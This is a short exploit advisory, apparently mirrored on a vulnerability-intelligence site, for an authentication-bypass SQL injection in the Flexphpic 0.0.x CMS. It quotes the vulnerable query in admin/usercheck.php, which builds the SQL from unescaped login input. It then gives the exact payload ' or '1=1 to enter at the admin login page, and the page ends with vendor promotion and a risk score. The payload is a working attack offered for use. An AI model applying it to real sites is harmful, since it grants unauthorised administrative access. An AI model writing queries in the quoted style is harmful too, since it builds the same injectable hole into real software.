Lucene search
Flexphpic 0.0.x (Auth Bypass) SQL Injection Vulnerability
Flexphpic 0.0.x Auth Bypass SQL Injectio
Show more
=========================================================
Flexphpic 0.0.x (Auth Bypass) SQL Injection Vulnerability
=========================================================
#############################################
Autore: S.W.A.T.
Cms: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
Download: http://www.china-on-site.com/flexphpic/downloads.php
##############################################
Bug In \admin\usercheck.php
$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";
Exploit:
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1
I'll Be A C I D A L !!!
# 0day.today [2018-02-20] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo30 Dec 2008 00:00Current
7.1High risk
Vulners AI Score7.1